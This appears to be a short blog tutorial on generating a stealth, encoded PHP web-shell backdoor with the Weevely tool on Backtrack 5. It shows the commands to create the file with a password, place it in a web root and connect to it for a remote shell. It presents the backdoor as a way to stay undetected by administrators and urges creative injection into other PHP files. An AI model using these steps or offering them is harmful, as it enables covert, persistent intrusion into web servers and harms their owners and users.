Silent Backdoor with Weevely

Silent Backdoor with Weevely

Ever think to gain access to your backdoor undetected? Well, maybe not all web administrators examine their php files? Weevely is the answer. Just follow these actions (I was doing this on Backtrack 5):

root@bt:~# >cd /pentest/backdoors/web/weevely
root@bt:/pentest/backdoors/web/weevely#./main.py -g -p bD_p4ss -o bd.php

Weevely 0.3 - Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/

+ Backdoor file 'bd.php' created with password 'bD_p4ss'.
root@bt:/pentest/backdoors/web/weevely#

Where:
-p = your password to access the backdoor
-g = generate a new encrypted php file (it doesn’t actually encrypt the file, they encode it)
-o = specify your output file

Now you have a new “encrypted” php file called bd.php. So how does it work?
You can put this script on the webserver document root.

Now take a look what will it be when i put the script and accessed it.

root@bt:/pentest/backdoors/web/weevely# ./main.py -t -u http://10.10.10.10/bd.php -p bD_p4ss

Weevely 0.3 - Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/

+ Using method 'system()'.
+ Retrieving terminal basic environment variables .

[www-data@gw /var/www] id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[www-data@gw /var/www] pwd
/var/www
[www-data@gw /var/www]

Voila! we’ve got a non-interactive shell!
Weevely can also be easily deployed inside any php file, but you should pay attention on where this script will be injected, be creative ?